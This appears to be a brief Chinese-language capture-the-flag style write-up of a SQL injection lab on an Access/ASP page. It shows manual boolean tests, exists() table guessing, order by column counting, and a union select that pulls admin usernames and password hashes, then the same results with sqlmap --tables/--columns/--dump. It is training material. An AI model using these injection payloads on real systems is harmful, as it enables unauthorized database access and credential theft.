https://www.mozhe.cn/bug/detail/89
手工注入
開啟靶場后,既然說明了是sql注入,那就不爆破了,看到那有個維護(hù)的說明城豁,點開看看
image.png
image.png
加單引號測試
image.png
and 1=1是沒有問題
image.png
and 1=2 不顯示 說明是有sql注入的
image.png
access沒有庫 所以我們需要先猜表
exists()
http://219.153.49.228:49048/new_list.asp?id=1%20and%20exists(select%20*%20from%20user)
image.png
說明user表不對
image.png
運行不報錯,說明存在admin表
接著利用order by猜有幾列 order by 4不報錯 說明是4列
image.png
然后利用語句union select 1,username,passwd,id from admin 拿賬號密碼
image.png
然后去md5解密抄课。
使用sqlmap注入
image.png
image.png
拿表:--tables
image.png
拿到表之后 猜字段:--columns -T admin
image.png
使用字段username password 拿數(shù)據(jù):--dump -T admin -C "admin,passwd"
image.png
image.png
也拿到了密碼
image.png
image.png